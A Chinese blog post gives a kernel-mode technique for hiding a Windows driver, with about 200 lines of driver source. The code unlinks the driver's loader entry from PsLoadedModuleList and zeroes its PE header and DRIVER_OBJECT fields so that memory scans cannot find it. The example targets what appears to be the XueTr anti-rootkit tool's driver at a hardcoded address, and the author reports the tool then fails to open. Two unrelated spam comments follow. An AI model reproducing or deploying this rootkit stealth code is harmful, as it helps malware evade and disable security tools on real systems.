首页 > WinDriver > WD-隐藏驱动
2012十月9

WD-隐藏驱动

[隐藏]

1.拆链

1.kd> dt _DRIVER_OBJECT
ntdll!_DRIVER_OBJECT
+0x000 Type : Int2B
+0x002 Size : Int2B
+0x004 DeviceObject : Ptr32 _DEVICE_OBJECT
+0x008 Flags : Uint4B
+0x00c DriverStart : Ptr32 Void
+0x010 DriverSize : Uint4B
+0x014 DriverSection : Ptr32 Void
+0x018 DriverExtension : Ptr32 _DRIVER_EXTENSION
+0x01c DriverName : _UNICODE_STRING
+0x024 HardwareDatabase : Ptr32 _UNICODE_STRING
+0x028 FastIoDispatch : Ptr32 _FAST_IO_DISPATCH
+0x02c DriverInit : Ptr32 long
+0x030 DriverStartIo : Ptr32 void
+0x034 DriverUnload : Ptr32 void
+0x038 MajorFunction : [28] Ptr32 long

其中DriverSection 指向PLDR_DATA_TABLE_ENTRY, 这结构本也在peb->ldr->遍历模快中出现过,所以拆链即可实现隐藏驱动


2.防止暴力搜索

把特征干掉,type ,size,pe头等


3.示例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
#include "main.h"
#include <ntimage.h>
 
typedef struct _LDR_DATA_TABLE_ENTRY {
	LIST_ENTRY InLoadOrderLinks;
	LIST_ENTRY InMemoryOrderLinks;
	LIST_ENTRY InInitializationOrderLinks;
	PVOID DllBase;
	PVOID EntryPoint;
	ULONG SizeOfImage;
	UNICODE_STRING FullDllName;
	UNICODE_STRING BaseDllName;
	ULONG Flags;
	USHORT LoadCount;
	USHORT TlsIndex;
	union {
		LIST_ENTRY HashLinks;
		struct {
			PVOID SectionPointer;
			ULONG CheckSum;
		};
	};
	union {
		struct {
			ULONG TimeDateStamp;
		};
		struct {
			PVOID LoadedImports;
		};
	};
	struct _ACTIVATION_CONTEXT *  EntryPointActivationContext;
	PVOID PatchInformation;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
 
//参数:驱动对象,驱动名
BOOLEAN HideDriverFromPsLoadedModuleList(PDRIVER_OBJECT DriverObject,PUNICODE_STRING DriverFileName)
{
	PLDR_DATA_TABLE_ENTRY LdrDataTable,HideLdrDataTable;
	BOOLEAN bRetOK = FALSE;
 
	__try
	{
		//这个DriverSection成员是指向一个PLDR_DATA_TABLE_ENTRY结构体
		LdrDataTable=(PLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection;
		//开始循环读取这个链表
		do
		{
			//判断basedllname是否可以访问
			if (LdrDataTable->BaseDllName.Length>0&&LdrDataTable->BaseDllName.Buffer!=NULL)
			{
				//进一步效验
				if(MmIsAddressValid(&LdrDataTable->BaseDllName.Buffer[LdrDataTable->BaseDllName.Length/2-1]))
				{
					if(RtlEqualUnicodeString(&LdrDataTable->BaseDllName,DriverFileName,FALSE))
					{
						//开始断链
						HideLdrDataTable=LdrDataTable;
						//断开链表
						LdrDataTable=(PLDR_DATA_TABLE_ENTRY)HideLdrDataTable->InLoadOrderLinks.Flink;
						LdrDataTable->InLoadOrderLinks.Blink=HideLdrDataTable->InLoadOrderLinks.Blink;
 
						//指向自身
						HideLdrDataTable->InLoadOrderLinks.Flink=&HideLdrDataTable->InLoadOrderLinks;
						HideLdrDataTable->InLoadOrderLinks.Blink=&HideLdrDataTable->InLoadOrderLinks;
 
						KdPrint(("PsLoadedModuleList success \r\n"));
 
						//退出
						bRetOK = TRUE;
						__leave;
					}
				}
			}
		}while ((PLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection!=LdrDataTable&&LdrDataTable!=NULL);
	}
	__except(EXCEPTION_EXECUTE_HANDLER)
	{
		KdPrint(("PsLoadedModuleList Error \r\n"));
	}
	return bRetOK;
}
 
BOOLEAN HideDriverFromPeHeader(PDRIVER_OBJECT pDriverObject)
{
	PMDL pHeaderMdl;
	PIMAGE_DOS_HEADER ImageDosHeader;
	PIMAGE_NT_HEADERS ImageNtHeaders;
	PUCHAR ImageBaseShadow;
	ULONG ImageBase;
	ULONG dwLdrDataTableEntry = 0;
	BOOLEAN bRetOK = FALSE;
 
	//判断当前的irql是否高于PASSIVE_LEVEL
	if (KeGetCurrentIrql() > PASSIVE_LEVEL)
	{
		return bRetOK;
	}
 
	ImageBase = (ULONG)pDriverObject->DriverStart;
	__try
	{
		//判断是否是有效的pe文件内存
		ImageDosHeader=(PIMAGE_DOS_HEADER)ImageBase;
		if (ImageDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
		{
			return bRetOK;
		}
		ImageNtHeaders=(PIMAGE_NT_HEADERS)(ImageBase+ImageDosHeader->e_lfanew);
		if (ImageNtHeaders->Signature!=IMAGE_NT_SIGNATURE)
		{
			return bRetOK;
		}
 
		//利用MDL的方式来修改这个PE
		//创建映射
		pHeaderMdl=IoAllocateMdl((PVOID)ImageBase,ImageNtHeaders->OptionalHeader.SizeOfHeaders,FALSE,FALSE,NULL);
		if (pHeaderMdl)
		{
			//锁住KernelMode,IoWriteAccess
			MmProbeAndLockPages(pHeaderMdl, KernelMode, IoWriteAccess);  //锁住,避免被page out,直接会导致MmGetSystemAddressForMdl蓝屏  - -。
			MmMapLockedPagesSpecifyCache(pHeaderMdl,KernelMode,MmWriteCombined,NULL,FALSE,NormalPagePriority);
 
			//得到了一个安全的可以操作的映射地址
			ImageBaseShadow = MmGetSystemAddressForMdlSafe(pHeaderMdl,NormalPagePriority);
 
			if (ImageBaseShadow)
			{
				//得到pe头
				ImageDosHeader=(PIMAGE_DOS_HEADER)ImageBaseShadow;
				ImageNtHeaders=(PIMAGE_NT_HEADERS)(ImageBaseShadow+ImageDosHeader->e_lfanew);
 
				//整个PE头清零
				*(PUSHORT)ImageDosHeader = 0x00;
				*(PULONG)ImageNtHeaders = 0x00;
 
				//抹掉DriverObject结构的中的信息
				DbgPrint("pDriverObject:%08x\r\n",pDriverObject);
 
				*(PUSHORT)pDriverObject = 0;
 
				DbgPrint("Size:%d\r\n",pDriverObject->Size);
 
				//0x168,抹去,清零
				pDriverObject->Size = 0x0;
				pDriverObject->DriverStart = 0x0;
				pDriverObject->DriverSize = 0x0;
				bRetOK = TRUE;
			}
			//解除映射
			MmUnmapLockedPages(ImageBaseShadow,pHeaderMdl);
			MmUnlockPages(pHeaderMdl);
			IoFreeMdl(pHeaderMdl);
 
		}
	}
	__except(EXCEPTION_EXECUTE_HANDLER)
	{
		KdPrint(("PeHeader Error \r\n"));
	}
	return bRetOK;
}
 
VOID HideDriver(PDRIVER_OBJECT pDrvObject,WCHAR *lpwServicesName)
{
	UNICODE_STRING DriverName;
 
	WCHAR lpwDriverFileName[100];
	memset(lpwDriverFileName,0,sizeof(lpwDriverFileName));
	wcsncat(lpwDriverFileName,lpwServicesName,wcslen(lpwServicesName));
 
	//初始化一个unicode
	RtlInitUnicodeString(&DriverName,lpwDriverFileName);
 
	//从链表隐藏模块
	if(HideDriverFromPsLoadedModuleList(pDrvObject,&DriverName))
	{
		KdPrint(("HideDriverFromPsLoadedModuleList ok\n"));
	}
	KdPrint(("Driver:%wZ\n",DriverName));
 
	//抹去pe的一些文件信息
	HideDriverFromPeHeader(pDrvObject);
}
 
 
VOID DDKUnload (IN PDRIVER_OBJECT pDriverObject)
{
	KdPrint(("[DDKUnload]-start\n"));
 
	KdPrint(("[DDKUnload]-end\n"));
}
 
NTSTATUS DriverEntry (IN PDRIVER_OBJECT pDriverObject,
					  IN PUNICODE_STRING pRegistryPath)
{
	//给它一个值,这个值大家也可以通过编程来搜索
	PDRIVER_OBJECT driver_object = 0x89e5fda0;
	KdPrint(("[DriverEntry]-start\n"));
	pDriverObject->DriverUnload = DDKUnload;
 
	//我们要隐藏的xuetr的驱动对象
	HideDriver(driver_object,L"NewSsdt.sys");
 
 
	KdPrint(("[DriverEntry]-end\n"));
	return STATUS_SUCCESS;
}

运行后,发现xuetr打不开了,应该使用了暴力内存搜索


文章作者:hgy413
本文地址:http://hgy413.com/1530.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

2 Responses to “WD-隐藏驱动”

  1. #1 Ilene 回复 | 引用 Post:2016-04-20 05:01

    You ought to take part in a contest for one of the most useful blogs on the web.
    I most certainly will highly recimmend this web site!

  2. #2 miraralcielo.com 回复 | 引用 Post:2016-08-03 22:59

    L’ergonomie de l’application, qui propose la caméra dès l’ouverture,
    incite les membres à créer du contenu et le partager à des
    amis ou dans leur Story.

发表评论